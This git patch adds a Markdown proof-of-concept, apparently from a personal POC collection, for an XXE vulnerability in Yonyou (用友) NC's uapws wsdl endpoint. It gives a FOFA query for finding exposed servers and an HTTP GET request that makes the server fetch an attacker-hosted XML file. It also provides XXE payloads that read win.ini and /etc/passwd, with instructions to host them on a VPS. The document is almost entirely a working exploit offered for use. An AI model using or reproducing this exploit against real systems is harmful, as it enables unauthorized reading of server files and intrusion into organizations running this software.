From 1b8661b36560d5a93f2bb36f46d66e5eba453e7b Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 15 Dec 2023 12:45:53 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8B=20NC=20uapws=20wsdl?=
 =?UTF-8?q?=20XXE=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 用友 NC uapws wsdl XXE漏洞.md | 40 +++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 用友 NC uapws wsdl XXE漏洞.md

diff --git a/用友 NC uapws wsdl XXE漏洞.md b/用友 NC uapws wsdl XXE漏洞.md
new file mode 100644
index 0000000..0657176
--- /dev/null
+++ b/用友 NC uapws wsdl XXE漏洞.md	
@@ -0,0 +1,40 @@
+## 用友 NC uapws wsdl XXE漏洞
+用友 NC uapws wsdl 存在XXE漏洞
+
+## fofa
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+```
+http://x.x.x.x/uapws/service/nc.uap.oba.update.IUpdateService?wsdl
+
+GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/test.xml HTTP/1.1
+Host:
+Pragma: no-cache
+Cache-Control: no-cache
+Accept: text/plain, */*; q=0.01
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/d11cc7e3-b0d2-484d-9911-ca742cc384d5)
+
+![image](https://github.com/wy876/POC/assets/139549762/7a77f089-7a6e-49e4-965b-59ebe9fe23fb)
+
+## xxe读取文件
+任意文件读取利用，需要VPS上建立对应操作系统的xml文件，然后开启http服务。xml文件如下
+
+```
+windows:
+<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///c://windows/win.ini">]><user><username>&name;</username><password>1</password></user>
+
+linux:
+evil.xml:
+<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///etc/passwd">]><user><username>&name;</username><password>1</password></user>
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/dfbf0584-9fa5-45ea-92d0-0e13160d4bf0)
+
+![image](https://github.com/wy876/POC/assets/139549762/c218c1dd-e73b-42b5-bbce-f96da6efbb08)
+